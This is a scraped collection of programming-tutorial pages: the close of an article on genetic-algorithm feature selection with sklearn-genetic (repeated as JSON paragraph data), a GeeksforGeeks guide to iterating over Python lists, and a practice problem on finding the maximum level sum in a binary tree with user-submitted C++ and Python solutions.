to a wide range of scenarios. This post explored how genetic algorithms are used for feature selection using the sklearn-genetic package. These algorithms have also been shown to be effective in hyper-parameter searches and generative design. While less conventional than the readily available methods in sklearn, genetic algorithms offer a distinct and practical approach to feature selection. The way that these algorithms optimize is far different from most other feature selection methods. The process is based on a pure natural selection approach. I encourage data scientists to take the time to understand and implement genetic algorithms in their work. If you’re interested in reading articles about novel data science tools and understanding machine learning algorithms, consider following me on Medium. If you’re interested in my writing and want to support me directly, please subscribe through the following link. This link ensures that I will receive a portion of your membership fees.
[ { "code": null, "e": 335, "s": 172, "text": "A genetic algorithm is a technique for optimization problems based on natural selection. In this post, I show how to use genetic algorithms for feature selection." }, { "code": null, "e": 471, "s": 335, "text": "While there are many well-known feature selections methods in scikit-learn, feature selection goes well beyond what is available there." }, { "code": null, "e": 657, "s": 471, "text": "Feature selection is a crucial aspect of any machine learning pipeline. However, these days there is a surplus of available data. As a consequence, there is often a surplus of features." }, { "code": null, "e": 790, "s": 657, "text": "As is often the case with many features, many are redundant. They add noise to your model and make model interpretation problematic." }, { "code": null, "e": 897, "s": 790, "text": "The problem is determining what features are relevant to the problem. The aim is to have quality features." }, { "code": null, "e": 951, "s": 897, "text": "This post makes use of the ‘sklearn-genetic’ package:" }, { "code": null, "e": 962, "s": 951, "text": "github.com" }, { "code": null, "e": 1096, "s": 962, "text": "This package is compatible with existing sklearn models and provides a great deal of functionality and options for genetic selection." }, { "code": null, "e": 1339, "s": 1096, "text": "For this post, I am using a genetic algorithm for feature selection. But, a genetic algorithm can also be used for hyper-parameter optimization. Because the steps are pretty straightforward and generalized, it applies to many different areas." }, { "code": null, "e": 1600, "s": 1339, "text": "Selecting features is an NP-Hard problem. The optimal configuration is a set or subset of those features, given a set of features. This method is a discrete selection. With a permutation of possibilities, it is very costly to determine the optimal feature set." }, { "code": null, "e": 1792, "s": 1600, "text": "Genetic algorithms use an approach to determine an optimal set based on evolution. For feature selection, the first step is to generate a population based on subsets of the possible features." }, { "code": null, "e": 2240, "s": 1792, "text": "From this population, the subsets are evaluated using a predictive model for the target task. Once each member of the population is considered, a tournament is performed to determine which subsets will continue into the next generation. The next generation is composed of the tournament winners, with some cross over (update the winning feature sets with features from the other winners) and mutation (introduce or remove some features at random)." }, { "code": null, "e": 2468, "s": 2240, "text": "An initial population is produced.A score is attached to the members of the population.A subset is selected for reproduction with a tournament.Select genetic material to pass on.Apply mutations.Repeat over multiple generations." }, { "code": null, "e": 2503, "s": 2468, "text": "An initial population is produced." }, { "code": null, "e": 2557, "s": 2503, "text": "A score is attached to the members of the population." }, { "code": null, "e": 2614, "s": 2557, "text": "A subset is selected for reproduction with a tournament." }, { "code": null, "e": 2650, "s": 2614, "text": "Select genetic material to pass on." }, { "code": null, "e": 2667, "s": 2650, "text": "Apply mutations." }, { "code": null, "e": 2701, "s": 2667, "text": "Repeat over multiple generations." }, { "code": null, "e": 2842, "s": 2701, "text": "The algorithm runs for a set number of generations (iterations). After which, the optimal member of the population is the selected features." }, { "code": null, "e": 3132, "s": 2842, "text": "The experiments are based on the UCI breast cancer dataset, which contains 569 instances and 30 features. With this dataset, I test several classifiers with all of the features, the subset of features from the genetic algorithm, and five features using the chi-squared test for comparison." }, { "code": null, "e": 3212, "s": 3132, "text": "Below is the code used to select up to five features using a genetic algorithm." }, { "code": null, "e": 3988, "s": 3212, "text": "from sklearn.datasets import load_breast_cancerfrom genetic_selection import GeneticSelectionCVfrom sklearn.tree import DecisionTreeClassifierimport pandas as pdimport numpy as npdata = load_breast_cancer()df = pd.DataFrame(data.data, columns=data.feature_names)df['target'] = data.targetX = df.drop(['target'], axis=1)y = df['target'].astype(float)estimator = DecisionTreeClassifier()model = GeneticSelectionCV( estimator, cv=5, verbose=0, scoring=\"accuracy\", max_features=5, n_population=100, crossover_proba=0.5, mutation_proba=0.2, n_generations=50, crossover_independent_proba=0.5, mutation_independent_proba=0.04, tournament_size=3, n_gen_no_change=10, caching=True, n_jobs=-1)model = model.fit(X, y)print('Features:', X.columns[model.support_])" }, { "code": null, "e": 4215, "s": 3988, "text": "The initial population (of size ‘n_population’) is generated at random from the sample space of feature sets. These sets are limited in scope by the parameter ‘max_features’, which sets the maximum size of each feature subset." }, { "code": null, "e": 4366, "s": 4215, "text": "For each member of the initial population, a score is measured with the target metric. This measurement is the performance of the estimator specified." }, { "code": null, "e": 4746, "s": 4366, "text": "A tournament selection is performed to determine which members will continue to the next generation. The number of members within the tournament is set with ‘tournament_size’. Tournament size is a selection of a few members from the population that compete against one another based on the scoring metric. The winner of a tournament is chosen as a parent for the next generation." }, { "code": null, "e": 5107, "s": 4746, "text": "The number of members for the tournament should remain small. When the value is quite large, the current best member is usually selected. This behaviour causes none of the weaker members to be selected. While providing temporary performance gains, ultimately, this leads to a reduced performance overall as the weaker options are not given a chance to improve." }, { "code": null, "e": 5614, "s": 5107, "text": "In natural selection, genetic information is stored in a chromosome. During reproduction, some genetic material is passed from parent to the children. Then the child contains genetic material from both of the parents. This property is represented with the parameter ‘crossover_proba’. The probability specified represents the chance of cross over from one generate to the next. There is also the parameter ‘crossover_independent_proba’, which is the probability that a feature will cross over to the child." }, { "code": null, "e": 6035, "s": 5614, "text": "A critical aspect of evolution is mutation. Mutation mitigates the risk of the search falling into a local optimum and getting stuck. At each generation, in addition to the crossover, a random mutation is added. The probability that a mutation will happen is set with the parameter ‘mutation_prob’. This parameter is combined with ‘mutation_independent_proba’, which is the chance of adding a feature to the feature set." }, { "code": null, "e": 6300, "s": 6035, "text": "Notably, setting this probability too high transforms the algorithm into a random selection process. So, you will want to keep this value relatively low. Randomly introducing features in each generation effectively acts as a regularization for the genetic process." }, { "code": null, "e": 6613, "s": 6300, "text": "The genetic search algorithm used here also has a ‘n_gen_no_change’ parameter which monitors if the best member of the population hasn’t changed over several generations. The search has found an optimum in this scenario. Consider increasing the mutation or cross over probabilities to vary the selection further." }, { "code": null, "e": 6883, "s": 6613, "text": "The results of the genetic vs the chi-squared feature selection are showed below. The baseline performance is also listed using all features. The results are from cross-validation, the performance measured is accuracy, and the number of features used is in parenthesis." }, { "code": null, "e": 7260, "s": 6883, "text": "While these results are by no means conclusive, they show the benefits of the genetic algorithm. The model performance is based on the subset of features from the genetic algorithm that consistently outperformed both the baseline model and the chi-square feature subset. There was a single exception with the logistic regression model, where the results were still comparable." }, { "code": null, "e": 7472, "s": 7260, "text": "Additionally, the optimal feature subsets produced were smaller than the maximum of five features. Models with fewer features are ultimately preferred to larger models as they are simpler and more interpretable." }, { "code": null, "e": 7556, "s": 7472, "text": "Genetic Algorithms are incredibly versatile and apply to a wide range of scenarios." }, { "code": null, "e": 7769, "s": 7556, "text": "This post explored how genetic algorithms are used for feature selection using the sklearn-genetic package. These algorithms have also been shown to be effective in hyper-parameter searches and generative design." }, { "code": null, "e": 8079, "s": 7769, "text": "While less conventional than the readily available methods in sklearn, genetic algorithms offer a distinct and practical approach to feature selection. The way that these algorithms optimize is far different from most other feature selection methods. The process is based on a pure natural selection approach." }, { "code": null, "e": 8186, "s": 8079, "text": "I encourage data scientists to take the time to understand and implement genetic algorithms in their work." }, { "code": null, "e": 8338, "s": 8186, "text": "If you’re interested in reading articles about novel data science tools and understanding machine learning algorithms, consider following me on Medium." } ]
Iterate over a list in Python - GeeksforGeeks
06 Nov, 2021 List is equivalent to arrays in other languages, with the extra benefit of being dynamic in size. In Python, the list is a type of container in Data Structures, which is used to store multiple data at the same time. Unlike Sets, lists in Python are ordered and have a definite count. There are multiple ways to iterate over a list in Python. Let’s see all the different ways to iterate over a list in Python, and performance comparison between them. Method #1: Using For loop Python3 # Python3 code to iterate over a listlist = [1, 3, 5, 7, 9] # Using for loopfor i in list: print(i) Output: 1 3 5 7 9 Method #2: For loop and range()In case we want to use the traditional for loop which iterates from number x to number y. Python3 # Python3 code to iterate over a listlist = [1, 3, 5, 7, 9] # getting length of listlength = len(list) # Iterating the index# same as 'for i in range(len(list))'for i in range(length): print(list[i]) Output: 1 3 5 7 9 Iterating using the index is not recommended if we can iterate over the elements (as done in Method #1). Method #3: Using while loop Python3 # Python3 code to iterate over a listlist = [1, 3, 5, 7, 9] # Getting length of listlength = len(list)i = 0 # Iterating using while loopwhile i < length: print(list[i]) i += 1 Output: 1 3 5 7 9 Method #4: Using list comprehension (Possibly the most concrete way). Python3 # Python3 code to iterate over a listlist = [1, 3, 5, 7, 9] # Using list comprehension[print(i) for i in list] Output: 1 3 5 7 9 Method #5: Using enumerate()If we want to convert the list into an iterable list of tuples (or get the index based on a condition check, for example in linear search you might need to save the index of minimum element), you can use the enumerate() function. Python3 # Python3 code to iterate over a listlist = [1, 3, 5, 7, 9] # Using enumerate()for i, val in enumerate(list): print (i, ",",val) Output: 0 , 1 1 , 3 2 , 5 3 , 7 4 , 9 Note: Even method #2 can be used to find the index, but method #1 can’t (Unless an extra variable is incremented every iteration) and method #5 gives a concise representation of this indexing. Method #6: Using numpyFor very large n-dimensional lists (for example an image array), it is sometimes better to use an external library such as numpy. Python3 # Python program for# iterating over arrayimport numpy as geek # creating an array using # arrange methoda = geek.arange(9) # shape array with 3 rows # and 4 columnsa = a.reshape(3, 3) # iterating an arrayfor x in geek.nditer(a): print(x) Output: 0 1 2 3 4 5 6 7 8 We can use np.ndenumerate() to mimic the behavior of enumerating. The extra power of NumPy comes from the fact that we can even control the way to visit the elements (Fortran order rather than C order, say :)) but the one caveat is that the np.nditer treats the array as read-only by default, so one must pass extra flags such as op_flags=[‘readwrite’] for it to be able to modify elements. Akanksha_Rai espinozahg punamsingh628700 Picked Python list-programs python-list Python python-list Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. Comments Old Comments How to Install PIP on Windows ? Create a Pandas DataFrame from Lists How to drop one or multiple columns in Pandas Dataframe *args and **kwargs in Python Graph Plotting in Python | Set 1 How To Convert Python Dictionary To JSON? Check if element exists in list in Python Convert integer to string in Python Python | Pandas dataframe.groupby() Python | Program to convert String to a List
[ { "code": null, "e": 23763, "s": 23735, "text": "\n06 Nov, 2021" }, { "code": null, "e": 24047, "s": 23763, "text": "List is equivalent to arrays in other languages, with the extra benefit of being dynamic in size. In Python, the list is a type of container in Data Structures, which is used to store multiple data at the same time. Unlike Sets, lists in Python are ordered and have a definite count." }, { "code": null, "e": 24213, "s": 24047, "text": "There are multiple ways to iterate over a list in Python. Let’s see all the different ways to iterate over a list in Python, and performance comparison between them." }, { "code": null, "e": 24240, "s": 24213, "text": "Method #1: Using For loop " }, { "code": null, "e": 24248, "s": 24240, "text": "Python3" }, { "code": "# Python3 code to iterate over a listlist = [1, 3, 5, 7, 9] # Using for loopfor i in list: print(i)", "e": 24352, "s": 24248, "text": null }, { "code": null, "e": 24361, "s": 24352, "text": "Output: " }, { "code": null, "e": 24371, "s": 24361, "text": "1\n3\n5\n7\n9" }, { "code": null, "e": 24494, "s": 24371, "text": "Method #2: For loop and range()In case we want to use the traditional for loop which iterates from number x to number y. " }, { "code": null, "e": 24502, "s": 24494, "text": "Python3" }, { "code": "# Python3 code to iterate over a listlist = [1, 3, 5, 7, 9] # getting length of listlength = len(list) # Iterating the index# same as 'for i in range(len(list))'for i in range(length): print(list[i])", "e": 24707, "s": 24502, "text": null }, { "code": null, "e": 24716, "s": 24707, "text": "Output: " }, { "code": null, "e": 24726, "s": 24716, "text": "1\n3\n5\n7\n9" }, { "code": null, "e": 24862, "s": 24726, "text": "Iterating using the index is not recommended if we can iterate over the elements (as done in Method #1). Method #3: Using while loop " }, { "code": null, "e": 24870, "s": 24862, "text": "Python3" }, { "code": "# Python3 code to iterate over a listlist = [1, 3, 5, 7, 9] # Getting length of listlength = len(list)i = 0 # Iterating using while loopwhile i < length: print(list[i]) i += 1", "e": 25054, "s": 24870, "text": null }, { "code": null, "e": 25063, "s": 25054, "text": "Output: " }, { "code": null, "e": 25073, "s": 25063, "text": "1\n3\n5\n7\n9" }, { "code": null, "e": 25145, "s": 25073, "text": "Method #4: Using list comprehension (Possibly the most concrete way). " }, { "code": null, "e": 25153, "s": 25145, "text": "Python3" }, { "code": "# Python3 code to iterate over a listlist = [1, 3, 5, 7, 9] # Using list comprehension[print(i) for i in list]", "e": 25265, "s": 25153, "text": null }, { "code": null, "e": 25274, "s": 25265, "text": "Output: " }, { "code": null, "e": 25284, "s": 25274, "text": "1\n3\n5\n7\n9" }, { "code": null, "e": 25543, "s": 25284, "text": "Method #5: Using enumerate()If we want to convert the list into an iterable list of tuples (or get the index based on a condition check, for example in linear search you might need to save the index of minimum element), you can use the enumerate() function. " }, { "code": null, "e": 25551, "s": 25543, "text": "Python3" }, { "code": "# Python3 code to iterate over a listlist = [1, 3, 5, 7, 9] # Using enumerate()for i, val in enumerate(list): print (i, \",\",val)", "e": 25684, "s": 25551, "text": null }, { "code": null, "e": 25693, "s": 25684, "text": "Output: " }, { "code": null, "e": 25723, "s": 25693, "text": "0 , 1\n1 , 3\n2 , 5\n3 , 7\n4 , 9" }, { "code": null, "e": 26071, "s": 25723, "text": "Note: Even method #2 can be used to find the index, but method #1 can’t (Unless an extra variable is incremented every iteration) and method #5 gives a concise representation of this indexing. Method #6: Using numpyFor very large n-dimensional lists (for example an image array), it is sometimes better to use an external library such as numpy. " }, { "code": null, "e": 26079, "s": 26071, "text": "Python3" }, { "code": "# Python program for# iterating over arrayimport numpy as geek # creating an array using # arrange methoda = geek.arange(9) # shape array with 3 rows # and 4 columnsa = a.reshape(3, 3) # iterating an arrayfor x in geek.nditer(a): print(x)", "e": 26324, "s": 26079, "text": null }, { "code": null, "e": 26333, "s": 26324, "text": "Output: " }, { "code": null, "e": 26351, "s": 26333, "text": "0\n1\n2\n3\n4\n5\n6\n7\n8" }, { "code": null, "e": 26743, "s": 26351, "text": "We can use np.ndenumerate() to mimic the behavior of enumerating. The extra power of NumPy comes from the fact that we can even control the way to visit the elements (Fortran order rather than C order, say :)) but the one caveat is that the np.nditer treats the array as read-only by default, so one must pass extra flags such as op_flags=[‘readwrite’] for it to be able to modify elements. " }, { "code": null, "e": 26756, "s": 26743, "text": "Akanksha_Rai" }, { "code": null, "e": 26767, "s": 26756, "text": "espinozahg" }, { "code": null, "e": 26784, "s": 26767, "text": "punamsingh628700" }, { "code": null, "e": 26791, "s": 26784, "text": "Picked" }, { "code": null, "e": 26812, "s": 26791, "text": "Python list-programs" }, { "code": null, "e": 26824, "s": 26812, "text": "python-list" }, { "code": null, "e": 26831, "s": 26824, "text": "Python" }, { "code": null, "e": 26843, "s": 26831, "text": "python-list" }, { "code": null, "e": 26941, "s": 26843, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 26950, "s": 26941, "text": "Comments" }, { "code": null, "e": 26963, "s": 26950, "text": "Old Comments" }, { "code": null, "e": 26995, "s": 26963, "text": "How to Install PIP on Windows ?" }, { "code": null, "e": 27032, "s": 26995, "text": "Create a Pandas DataFrame from Lists" }, { "code": null, "e": 27088, "s": 27032, "text": "How to drop one or multiple columns in Pandas Dataframe" }, { "code": null, "e": 27117, "s": 27088, "text": "*args and **kwargs in Python" }, { "code": null, "e": 27150, "s": 27117, "text": "Graph Plotting in Python | Set 1" }, { "code": null, "e": 27192, "s": 27150, "text": "How To Convert Python Dictionary To JSON?" }, { "code": null, "e": 27234, "s": 27192, "text": "Check if element exists in list in Python" }, { "code": null, "e": 27270, "s": 27234, "text": "Convert integer to string in Python" }, { "code": null, "e": 27306, "s": 27270, "text": "Python | Pandas dataframe.groupby()" } ]
NLP-based Data Preprocessing Method to Improve Prediction Model Accuracy | by Sergey Burukin | Towards Data Science
Nowadays, using machine learning for peer-to-peer marketplace is very popular as it can improve the UX and increase customer loyalty. In the part 1, I described the main stages of the ML-based award recommendation system for crowdsourcing platform Arcbazar.com, where a customer initiates a designers’ competition and sets a money prize. The ML system was trained on the dataset of the completed competitions with paid awards to help a customer set the optimal award for a certain architectural project. The optimal regression algorithm was chosen after the data analysis. As it was mentioned in the previous article, I made some simplifications of the dataset. I replaced three text description fields of the training dataset with one that had a numeric value — a total quantity of chars. So, I got the 5-field dataset instead of 7 fields. However, the tests showed that the model accuracy could be increased. In this post, I’m going to tell you how to upgrade the prediction model using Natural Language Processing for the dataset preprocessing. A classical Greek philosopher Socrates said, “Speak, so that I can see you”. This aphorism means that our speech tells more about our personality than we want to say. Also, it gives a cue for a hypothesis that the project’s text description may be linked with award amount and these relationships are much stronger than a number of chars. I decided to transform string-type data of the text descriptions to numeric values using Natural Language Processing methods with an additional aim to enrich and homogenize dataset. The ML system upgrade was divided into three main steps: Text Cleaning.Text-to-Number Transformation.Choosing the Optimal Regression Method. Text Cleaning. Text-to-Number Transformation. Choosing the Optimal Regression Method. For each text description field of the database, I applied text cleaning algorithms using Natural Language Toolkit and gensim libraries for Python language. However, you can use any NLP library you prefer. I transformed text to lower case, removed punctuation and English-language stopwords. #Transform to lower caseimport stringfeatures['description'] = features['description'].str.lower()#Remove punctuationtable = str.maketrans('', '', string.punctuation)features['description'] = [features['description'][row].translate(table) for row in range(len(features['description']))]#Remove stopwordsimport nltknltk.download('stopwords')from nltk.corpus import stopwordsstop = stopwords.words('english')features['description'] = features['description'].apply(lambda x: " ".join(x for x in x.split() if x not in stop)) Then the most and the least frequent words in each field were removed. The meanings of the common (most frequent) words in the semantic analysis are very close to stopwords. They add a noise-like pattern to the texts. Furthermore, the least frequent words have a negligible meaning, and they can be filtered out. The aim of this step was to filter unique words as the most valuable. I used a graphic analysis, plotting words vs their frequency. #Find words spreading (each word frequency)freq_d = pd.Series(‘ ‘.join(features[‘description’]).split()).value_counts()#Plot the words distributionfreq_d.plot(kind=’line’, ax=None, figsize=None, use_index=True, title=None, grid=None, legend=False, style=None, logx=False, logy=False, loglog=False, xticks=None, yticks=None, xlim=None, ylim=None, rot=None, fontsize=None, colormap=None, table=False, yerr=None, xerr=None, label=None, secondary_y=False) The word frequency visualization helped me filter the words with approximate frequencies between 5 and 200. #Remove the least frequent wordsrare_d = pd.Series(' '.join(features['description']).split()).value_counts()[-17528:]rare_d = list(rare_d.index)features['description'] = features['description'].apply(lambda x: " ".join(x for x in x.split() if x not in rare_d))#Remove the most frequent wordsfreq_d = pd.Series(' '.join(features['description']).split()).value_counts()[:30]freq_d = list(freq_d.index)features['description'] = features['description'].apply(lambda x: " ".join(x for x in x.split() if x not in freq_d)) Then each text record was tokenized — a text was split into an array of words. features['description'] = [text.split() for text in features['description']] The combination of words and their frequency gave a vector of text, where each word is replaced with its index. Similar vectors indicate similar texts. That is how semantic searching engines work. Unlike modern search engines, here I only concentrate on a single aspect of possible similarities — on apparent semantic relatedness of their texts (words). No hyperlinks, no random-walk static ranks, just a semantic extension over the boolean keyword match. #Create a set of text records for each fieldfrom gensim import corporadict_d = corpora.Dictionary(features['description']) Converting a text into the bag-of-words (BoW) format, that is a list of (token_id, token_count) tuples, was done by the attribute of a class gensim.corpora.dictionary.Dictionary() — .doc2bow(). #Convert tokenized text (corpora) to vectorscorpus_d = [dict_d.doc2bow(line) for line in features['description']] To get a real number instead of a vector, I used a norm that is a function that assigns a strictly positive length or size to each vector in a vector space. #Transform vectors of texts to scalar values (calculating norms of vectors)from numpy import linalg as LAcorpus_d_vec_norm = [LA.norm(vec) for vec in corpus_d]#Replace text descriptions in the database with norms of vectorsfeatures[‘description’] = corpus_d_vec_norm Finally, I got a homogeneous the 7-field dataset. I used the best-rated machine learning method from the previous tests — Random Forest Regressor — to calculate how the model fits our new dataset. The coefficient of determination, R-squared, was a twice better (~ 0.75), than with 5-field dataset (0.37). Initially, I had the mixed dataset: the first three fields (drop-down menu) are obviously interdependent, and the next three (descriptions) are more fluctuant. Due to my hypothesis, descriptions fields are more philosophically (or even psychologically) close to an award value. So, I changed the ML method to the artificial neural network. By the way, this algorithm was rejected in the previous test with 5-field dataset due to its very low R-squared of 0.05. However, Multi-layer Perceptron Regressor with just three hidden layers gave a fantastic result with R-squared of 0.999962. import sklearnfrom sklearn.neural_network import MLPRegressormlpreg = MLPRegressor(hidden_layer_sizes=(3,), activation=’relu’, solver=’adam’, alpha=0.001, batch_size=’auto’, learning_rate=’adaptive’, learning_rate_init=0.01, power_t=0.5, max_iter=1000, shuffle=True, random_state=9, tol=0.0001, verbose=False, warm_start=False, momentum=0.9, nesterovs_momentum=True, early_stopping=False, validation_fraction=0.1, beta_1=0.9, beta_2=0.999, epsilon=1e-08) 1. The obtained results show the suitability of the norm of the vector for replacing a vector of text without significant data loss. 2. Customers’ verbal description of his/her needs is much closer to a money award amount than drop-down menus, because that text may express human essence or common motive. 3. The ANN-based algorithm is better at ‘understanding’ the human nature than Random Forest, first of all, because of its structural similarity to a human brain.
[ { "code": null, "e": 744, "s": 171, "text": "Nowadays, using machine learning for peer-to-peer marketplace is very popular as it can improve the UX and increase customer loyalty. In the part 1, I described the main stages of the ML-based award recommendation system for crowdsourcing platform Arcbazar.com, where a customer initiates a designers’ competition and sets a money prize. The ML system was trained on the dataset of the completed competitions with paid awards to help a customer set the optimal award for a certain architectural project. The optimal regression algorithm was chosen after the data analysis." }, { "code": null, "e": 1012, "s": 744, "text": "As it was mentioned in the previous article, I made some simplifications of the dataset. I replaced three text description fields of the training dataset with one that had a numeric value — a total quantity of chars. So, I got the 5-field dataset instead of 7 fields." }, { "code": null, "e": 1082, "s": 1012, "text": "However, the tests showed that the model accuracy could be increased." }, { "code": null, "e": 1219, "s": 1082, "text": "In this post, I’m going to tell you how to upgrade the prediction model using Natural Language Processing for the dataset preprocessing." }, { "code": null, "e": 1558, "s": 1219, "text": "A classical Greek philosopher Socrates said, “Speak, so that I can see you”. This aphorism means that our speech tells more about our personality than we want to say. Also, it gives a cue for a hypothesis that the project’s text description may be linked with award amount and these relationships are much stronger than a number of chars." }, { "code": null, "e": 1740, "s": 1558, "text": "I decided to transform string-type data of the text descriptions to numeric values using Natural Language Processing methods with an additional aim to enrich and homogenize dataset." }, { "code": null, "e": 1797, "s": 1740, "text": "The ML system upgrade was divided into three main steps:" }, { "code": null, "e": 1881, "s": 1797, "text": "Text Cleaning.Text-to-Number Transformation.Choosing the Optimal Regression Method." }, { "code": null, "e": 1896, "s": 1881, "text": "Text Cleaning." }, { "code": null, "e": 1927, "s": 1896, "text": "Text-to-Number Transformation." }, { "code": null, "e": 1967, "s": 1927, "text": "Choosing the Optimal Regression Method." }, { "code": null, "e": 2259, "s": 1967, "text": "For each text description field of the database, I applied text cleaning algorithms using Natural Language Toolkit and gensim libraries for Python language. However, you can use any NLP library you prefer. I transformed text to lower case, removed punctuation and English-language stopwords." }, { "code": null, "e": 2780, "s": 2259, "text": "#Transform to lower caseimport stringfeatures['description'] = features['description'].str.lower()#Remove punctuationtable = str.maketrans('', '', string.punctuation)features['description'] = [features['description'][row].translate(table) for row in range(len(features['description']))]#Remove stopwordsimport nltknltk.download('stopwords')from nltk.corpus import stopwordsstop = stopwords.words('english')features['description'] = features['description'].apply(lambda x: \" \".join(x for x in x.split() if x not in stop))" }, { "code": null, "e": 3225, "s": 2780, "text": "Then the most and the least frequent words in each field were removed. The meanings of the common (most frequent) words in the semantic analysis are very close to stopwords. They add a noise-like pattern to the texts. Furthermore, the least frequent words have a negligible meaning, and they can be filtered out. The aim of this step was to filter unique words as the most valuable. I used a graphic analysis, plotting words vs their frequency." }, { "code": null, "e": 3732, "s": 3225, "text": "#Find words spreading (each word frequency)freq_d = pd.Series(‘ ‘.join(features[‘description’]).split()).value_counts()#Plot the words distributionfreq_d.plot(kind=’line’, ax=None, figsize=None, use_index=True, title=None, grid=None, legend=False, style=None, logx=False, logy=False, loglog=False, xticks=None, yticks=None, xlim=None, ylim=None, rot=None, fontsize=None, colormap=None, table=False, yerr=None, xerr=None, label=None, secondary_y=False)" }, { "code": null, "e": 3840, "s": 3732, "text": "The word frequency visualization helped me filter the words with approximate frequencies between 5 and 200." }, { "code": null, "e": 4356, "s": 3840, "text": "#Remove the least frequent wordsrare_d = pd.Series(' '.join(features['description']).split()).value_counts()[-17528:]rare_d = list(rare_d.index)features['description'] = features['description'].apply(lambda x: \" \".join(x for x in x.split() if x not in rare_d))#Remove the most frequent wordsfreq_d = pd.Series(' '.join(features['description']).split()).value_counts()[:30]freq_d = list(freq_d.index)features['description'] = features['description'].apply(lambda x: \" \".join(x for x in x.split() if x not in freq_d))" }, { "code": null, "e": 4435, "s": 4356, "text": "Then each text record was tokenized — a text was split into an array of words." }, { "code": null, "e": 4512, "s": 4435, "text": "features['description'] = [text.split() for text in features['description']]" }, { "code": null, "e": 4968, "s": 4512, "text": "The combination of words and their frequency gave a vector of text, where each word is replaced with its index. Similar vectors indicate similar texts. That is how semantic searching engines work. Unlike modern search engines, here I only concentrate on a single aspect of possible similarities — on apparent semantic relatedness of their texts (words). No hyperlinks, no random-walk static ranks, just a semantic extension over the boolean keyword match." }, { "code": null, "e": 5091, "s": 4968, "text": "#Create a set of text records for each fieldfrom gensim import corporadict_d = corpora.Dictionary(features['description'])" }, { "code": null, "e": 5285, "s": 5091, "text": "Converting a text into the bag-of-words (BoW) format, that is a list of (token_id, token_count) tuples, was done by the attribute of a class gensim.corpora.dictionary.Dictionary() — .doc2bow()." }, { "code": null, "e": 5399, "s": 5285, "text": "#Convert tokenized text (corpora) to vectorscorpus_d = [dict_d.doc2bow(line) for line in features['description']]" }, { "code": null, "e": 5556, "s": 5399, "text": "To get a real number instead of a vector, I used a norm that is a function that assigns a strictly positive length or size to each vector in a vector space." }, { "code": null, "e": 5823, "s": 5556, "text": "#Transform vectors of texts to scalar values (calculating norms of vectors)from numpy import linalg as LAcorpus_d_vec_norm = [LA.norm(vec) for vec in corpus_d]#Replace text descriptions in the database with norms of vectorsfeatures[‘description’] = corpus_d_vec_norm" }, { "code": null, "e": 5873, "s": 5823, "text": "Finally, I got a homogeneous the 7-field dataset." }, { "code": null, "e": 6128, "s": 5873, "text": "I used the best-rated machine learning method from the previous tests — Random Forest Regressor — to calculate how the model fits our new dataset. The coefficient of determination, R-squared, was a twice better (~ 0.75), than with 5-field dataset (0.37)." }, { "code": null, "e": 6288, "s": 6128, "text": "Initially, I had the mixed dataset: the first three fields (drop-down menu) are obviously interdependent, and the next three (descriptions) are more fluctuant." }, { "code": null, "e": 6589, "s": 6288, "text": "Due to my hypothesis, descriptions fields are more philosophically (or even psychologically) close to an award value. So, I changed the ML method to the artificial neural network. By the way, this algorithm was rejected in the previous test with 5-field dataset due to its very low R-squared of 0.05." }, { "code": null, "e": 6713, "s": 6589, "text": "However, Multi-layer Perceptron Regressor with just three hidden layers gave a fantastic result with R-squared of 0.999962." }, { "code": null, "e": 7224, "s": 6713, "text": "import sklearnfrom sklearn.neural_network import MLPRegressormlpreg = MLPRegressor(hidden_layer_sizes=(3,), activation=’relu’, solver=’adam’, alpha=0.001, batch_size=’auto’, learning_rate=’adaptive’, learning_rate_init=0.01, power_t=0.5, max_iter=1000, shuffle=True, random_state=9, tol=0.0001, verbose=False, warm_start=False, momentum=0.9, nesterovs_momentum=True, early_stopping=False, validation_fraction=0.1, beta_1=0.9, beta_2=0.999, epsilon=1e-08)" }, { "code": null, "e": 7357, "s": 7224, "text": "1. The obtained results show the suitability of the norm of the vector for replacing a vector of text without significant data loss." }, { "code": null, "e": 7530, "s": 7357, "text": "2. Customers’ verbal description of his/her needs is much closer to a money award amount than drop-down menus, because that text may express human essence or common motive." } ]
Max Level Sum in Binary Tree | Practice | GeeksforGeeks
Given a Binary Tree having positive and negative nodes. Find the maximum sum of a level in the given Binary Tree. Example 1: Input : 4 / \ 2 -5 / \ / \ -1 3 -2 6 Output: 6 Explanation : Sum of all nodes of 0'th level is 4 Sum of all nodes of 1'th level is -3 Sum of all nodes of 2'th level is 6 Hence maximum sum is 6 Example 2: Input : 1 / \ 2 3 / \ \ 4 5 8 / \ 6 7 Output : 17 Explanation: Maximum sum is at level 2. Your Task: You dont need to read input or print anything. Complete the function maxLevelSum() which takes root node as input parameter and returns the maximum sum of any horizontal level in the given Binary Tree. Expected Time Complexity: O(N) Expected Auxiliary Space: O(N) Constraints: 1 ≤ N ≤ 104 0 harshscode1 week ago vector<int> v; queue<Node*> q; q.push(root); while(!q.empty()) { int n=q.size(); int sum=0; while(n--) { Node *temp=q.front(); q.pop(); int p=temp->data; sum+=p; if(temp->left) q.push(temp->left); if(temp->right) q.push(temp->right); } v.push_back(sum); } int maxx=v[0]; for(int i=0;i<v.size();i++) { if(v[i]>maxx) maxx=v[i]; } return maxx; 0 detroix071 month ago class Solution { public: /*You are required to complete below method */ int maxLevelSum(Node* root) { queue<Node*> q; q.push(root); q.push(NULL); int sum = 0; int max=INT_MIN; while(q.size()!=0) { Node* Front = q.front(); q.pop(); if(Front==NULL) { if(sum>max) max=sum; sum=0; if(q.size()==0) break; q.push(NULL); } else { sum+=Front->data; if(Front->left!=NULL) q.push(Front->left); if(Front->right!=NULL) q.push(Front->right); } } return max; }}; 0 namanshah22752 months ago SHORT SOLUTION : TIME O(N) 0.4 sec int maxLevelSum(Node* root) { queue<Node*> q; int ans = INT_MIN; int newans; q.push(root); while(!q.empty()) { newans = 0; int n = q.size(); while(n--) { Node* p = q.front(); newans = newans + p->data; q.pop(); if(p->left) q.push(p->left); if(p->right) q.push(p->right); } if(newans > ans) ans = newans; } return ans; }}; 0 owaischem3 months ago PYTHON SOLUTION: TIME TAKEN:12.7/15.5 (time taken is high due to the use of recursion) class Solution: def maxLevelSum(self, root): def height(root): if root==None: return 0 left=height(root.left) right=height(root.right) return max(left,right)+1 def level_traversal(root,level): if root==None: return None elif level==0: list1.append(root.data) else: level_traversal(root.left,level-1) level_traversal(root.right,level-1) tall=height(root) maximum=-9999999 list1=[] for i in range(tall): level_traversal(root,i) maximum=max(maximum,sum(list1)) list1=[] return maximum 0 